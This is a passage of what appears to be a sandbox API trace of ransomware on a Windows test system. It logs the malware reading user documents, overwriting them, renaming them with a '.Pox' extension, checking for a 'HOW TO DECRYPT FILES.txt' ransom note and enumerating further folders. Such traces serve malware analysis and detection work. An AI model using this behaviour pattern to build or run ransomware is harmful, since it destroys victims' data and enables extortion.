halpmcxz\\documents\\y0f8w8ps2finld97.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bba150, ftCreationTime.dwHighDateTime=0x1d4fbf0, ftLastAccessTime.dwLowDateTime=0x3939010, ftLastAccessTime.dwHighDateTime=0x1d52081, ftLastWriteTime.dwLowDateTime=0x29a65e60, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x11cf0)) returned 1 [0039.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.369] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y0f8w8ps2finld97.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y0f8w8ps2finld97.pptx.pox")) returned 1 [0039.369] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", lpFilePart=0x0) returned 0x40 [0039.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.369] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y_f_n f2mg6ykljf0lc.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.369] GetFileType (hFile=0x26c) returned 0x1 [0039.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.370] GetFileType (hFile=0x26c) returned 0x1 [0039.370] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x54df [0039.370] ReadFile (in: hFile=0x26c, lpBuffer=0x2401d14, nNumberOfBytesToRead=0x54df, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2401d14*, lpNumberOfBytesRead=0x3ae570*=0x54df, lpOverlapped=0x0) returned 1 [0039.371] CloseHandle (hObject=0x26c) returned 1 [0039.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", lpFilePart=0x0) returned 0x40 [0039.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y_f_n f2mg6ykljf0lc.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.470] GetFileType (hFile=0x26c) returned 0x1 [0039.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.470] GetFileType (hFile=0x26c) returned 0x1 [0039.470] WriteFile (in: hFile=0x26c, lpBuffer=0x24694bc*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24694bc*, lpNumberOfBytesWritten=0x3ae564*=0x54e0, lpOverlapped=0x0) returned 1 [0039.471] CloseHandle (hObject=0x26c) returned 1 [0039.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx", lpFilePart=0x0) returned 0x40 [0039.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx.Pox", lpFilePart=0x0) returned 0x44 [0039.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y_f_n f2mg6ykljf0lc.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf606fb60, ftCreationTime.dwHighDateTime=0x1d51574, ftLastAccessTime.dwLowDateTime=0xb20f6250, ftLastAccessTime.dwHighDateTime=0x1d4df99, ftLastWriteTime.dwLowDateTime=0x29b70800, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x54e0)) returned 1 [0039.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.473] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y_f_n f2mg6ykljf0lc.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y_f_n F2Mg6yklJf0LC.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y_f_n f2mg6ykljf0lc.pptx.pox")) returned 1 [0039.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", lpFilePart=0x0) returned 0x40 [0039.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z0uubt3lxozcdl4tpm0.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.474] GetFileType (hFile=0x26c) returned 0x1 [0039.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.474] GetFileType (hFile=0x26c) returned 0x1 [0039.474] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x9032 [0039.474] ReadFile (in: hFile=0x26c, lpBuffer=0x246ef74, nNumberOfBytesToRead=0x9032, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x246ef74*, lpNumberOfBytesRead=0x3ae570*=0x9032, lpOverlapped=0x0) returned 1 [0039.475] CloseHandle (hObject=0x26c) returned 1 [0039.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", lpFilePart=0x0) returned 0x40 [0039.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z0uubt3lxozcdl4tpm0.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.491] GetFileType (hFile=0x26c) returned 0x1 [0039.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.491] GetFileType (hFile=0x26c) returned 0x1 [0039.491] WriteFile (in: hFile=0x26c, lpBuffer=0x24e8ea0*, nNumberOfBytesToWrite=0x9040, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24e8ea0*, lpNumberOfBytesWritten=0x3ae564*=0x9040, lpOverlapped=0x0) returned 1 [0039.493] CloseHandle (hObject=0x26c) returned 1 [0039.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx", lpFilePart=0x0) returned 0x40 [0039.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx.Pox", lpFilePart=0x0) returned 0x44 [0039.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z0uubt3lxozcdl4tpm0.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b8334a0, ftCreationTime.dwHighDateTime=0x1d51db5, ftLastAccessTime.dwLowDateTime=0x47771b40, ftLastAccessTime.dwHighDateTime=0x1d4b974, ftLastWriteTime.dwLowDateTime=0x29b96960, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x9040)) returned 1 [0039.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.494] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z0uubt3lxozcdl4tpm0.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z0uuBt3LxozCdl4TPm0.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z0uubt3lxozcdl4tpm0.docx.pox")) returned 1 [0039.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0039.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56", lpFilePart=0x0) returned 0x3c [0039.495] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\", lpFilePart=0x0) returned 0x3d [0039.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406188 [0039.495] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.495] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b4e250, ftCreationTime.dwHighDateTime=0x1d4c629, ftLastAccessTime.dwLowDateTime=0x11b03260, ftLastAccessTime.dwHighDateTime=0x1d4cbeb, ftLastWriteTime.dwLowDateTime=0x11b03260, ftLastWriteTime.dwHighDateTime=0x1d4cbeb, nFileSizeHigh=0x0, nFileSizeLow=0x13f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="0pkDP.docx", cAlternateFileName="0PKDP~1.DOC")) returned 1 [0039.495] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40db72a0, ftCreationTime.dwHighDateTime=0x1d4cab2, ftLastAccessTime.dwLowDateTime=0xec7290a0, ftLastAccessTime.dwHighDateTime=0x1d4d46a, ftLastWriteTime.dwLowDateTime=0xec7290a0, ftLastWriteTime.dwHighDateTime=0x1d4d46a, nFileSizeHigh=0x0, nFileSizeLow=0x1771, dwReserved0=0x0, dwReserved1=0x0, cFileName="1icBSdqhb.csv", cAlternateFileName="1ICBSD~1.CSV")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x473b23e0, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0xe252a050, ftLastAccessTime.dwHighDateTime=0x1d4cf0c, ftLastWriteTime.dwLowDateTime=0xe252a050, ftLastWriteTime.dwHighDateTime=0x1d4cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x3354, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eDNkANdedcffiKQ5FH8.ods", cAlternateFileName="6EDNKA~1.ODS")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="b2naIXbZa6", cAlternateFileName="B2NAIX~1")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c2dea0, ftCreationTime.dwHighDateTime=0x1d4d2e8, ftLastAccessTime.dwLowDateTime=0x6d7d7a20, ftLastAccessTime.dwHighDateTime=0x1d4d083, ftLastWriteTime.dwLowDateTime=0x6d7d7a20, ftLastWriteTime.dwHighDateTime=0x1d4d083, nFileSizeHigh=0x0, nFileSizeLow=0x841f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiXAMo2Ojlsrm0hM.pdf", cAlternateFileName="CIXAMO~1.PDF")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57467680, ftCreationTime.dwHighDateTime=0x1d4d1d2, ftLastAccessTime.dwLowDateTime=0x9703c660, ftLastAccessTime.dwHighDateTime=0x1d4c674, ftLastWriteTime.dwLowDateTime=0x9703c660, ftLastWriteTime.dwHighDateTime=0x1d4c674, nFileSizeHigh=0x0, nFileSizeLow=0x168d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiUwgPxxPJM-B6t5U9Y.xlsx", cAlternateFileName="DIUWGP~1.XLS")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e27a8f0, ftCreationTime.dwHighDateTime=0x1d4ce29, ftLastAccessTime.dwLowDateTime=0xb3de7890, ftLastAccessTime.dwHighDateTime=0x1d4c564, ftLastWriteTime.dwLowDateTime=0xb3de7890, ftLastWriteTime.dwHighDateTime=0x1d4c564, nFileSizeHigh=0x0, nFileSizeLow=0x6131, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlY6cRuyqsRGmwwsdu.ppt", cAlternateFileName="FLY6CR~1.PPT")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f5b2c70, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0xaf1aa3e0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0xaf1aa3e0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0xaf45, dwReserved0=0x0, dwReserved1=0x0, cFileName="GXOv.docx", cAlternateFileName="GXOV~1.DOC")) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd46a90, ftCreationTime.dwHighDateTime=0x1d4d417, ftLastAccessTime.dwLowDateTime=0x5847f4d0, ftLastAccessTime.dwHighDateTime=0x1d4d4ef, ftLastWriteTime.dwLowDateTime=0x5847f4d0, ftLastWriteTime.dwHighDateTime=0x1d4d4ef, nFileSizeHigh=0x0, nFileSizeLow=0x676a, dwReserved0=0x0, dwReserved1=0x0, cFileName="smjsQosHj4xlT.odp", cAlternateFileName="SMJSQO~1.ODP")) returned 1 [0039.497] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f949e0, ftCreationTime.dwHighDateTime=0x1d4c86e, ftLastAccessTime.dwLowDateTime=0x9aae99e0, ftLastAccessTime.dwHighDateTime=0x1d4cc9e, ftLastWriteTime.dwLowDateTime=0x9aae99e0, ftLastWriteTime.dwHighDateTime=0x1d4cc9e, nFileSizeHigh=0x0, nFileSizeLow=0x15b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="vJ YPF-i Nn4.xls", cAlternateFileName="VJYPF-~1.XLS")) returned 1 [0039.497] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44a9210, ftCreationTime.dwHighDateTime=0x1d4d548, ftLastAccessTime.dwLowDateTime=0x1d579390, ftLastAccessTime.dwHighDateTime=0x1d4ceb8, ftLastWriteTime.dwLowDateTime=0x1d579390, ftLastWriteTime.dwHighDateTime=0x1d4ceb8, nFileSizeHigh=0x0, nFileSizeLow=0x174f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yfFKDC845C6.pptx", cAlternateFileName="YFFKDC~1.PPT")) returned 1 [0039.497] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.497] FindClose (in: hFindFile=0x406188 | out: hFindFile=0x406188) returned 1 [0039.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0039.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0039.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0039.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56", lpFilePart=0x0) returned 0x3c [0039.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\", lpFilePart=0x0) returned 0x3d [0039.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406188 [0039.497] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x684a36a0, ftCreationTime.dwHighDateTime=0x1d4cd32, ftLastAccessTime.dwLowDateTime=0x8821f340, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0x8821f340, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b4e250, ftCreationTime.dwHighDateTime=0x1d4c629, ftLastAccessTime.dwLowDateTime=0x11b03260, ftLastAccessTime.dwHighDateTime=0x1d4cbeb, ftLastWriteTime.dwLowDateTime=0x11b03260, ftLastWriteTime.dwHighDateTime=0x1d4cbeb, nFileSizeHigh=0x0, nFileSizeLow=0x13f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="0pkDP.docx", cAlternateFileName="0PKDP~1.DOC")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40db72a0, ftCreationTime.dwHighDateTime=0x1d4cab2, ftLastAccessTime.dwLowDateTime=0xec7290a0, ftLastAccessTime.dwHighDateTime=0x1d4d46a, ftLastWriteTime.dwLowDateTime=0xec7290a0, ftLastWriteTime.dwHighDateTime=0x1d4d46a, nFileSizeHigh=0x0, nFileSizeLow=0x1771, dwReserved0=0x0, dwReserved1=0x0, cFileName="1icBSdqhb.csv", cAlternateFileName="1ICBSD~1.CSV")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x473b23e0, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0xe252a050, ftLastAccessTime.dwHighDateTime=0x1d4cf0c, ftLastWriteTime.dwLowDateTime=0xe252a050, ftLastWriteTime.dwHighDateTime=0x1d4cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x3354, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eDNkANdedcffiKQ5FH8.ods", cAlternateFileName="6EDNKA~1.ODS")) returned 1 [0039.498] FindNextFileW (in: hFindFile=0x406188, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, 